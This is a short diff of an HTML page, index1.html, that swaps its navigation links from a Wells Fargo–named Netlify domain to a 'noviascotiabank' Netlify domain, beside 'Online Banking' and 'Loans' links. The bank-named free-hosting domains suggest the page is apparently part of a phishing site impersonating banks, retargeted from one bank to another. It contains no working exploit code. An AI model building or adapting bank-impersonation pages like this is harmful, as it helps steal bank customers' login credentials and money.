--- a/index1.html
+++ b/index1.html
@@ -10,10 +10,10 @@
 	<br>
 	<br>
 		<ul>
-  <li><a href="https://wellsfargoonlinelogin.netlify.app/">Home</a></li>
+  <li><a href="https://noviascotiabank.netlify.app/index1.html">Home</a></li>
   <li><a href="news.asp">Online Banking</a></li>
   <li><a href="contact.asp">Loans</a></li>
-  <li><a href="https://wellsfargoonlinelogin.netlify.app/">Logout</a></li>
+  <li><a href="https://noviascotiabank.netlify.app/">Logout</a></li>
 			</ul>
  <script> 
 function googleTranslateElementInit() {
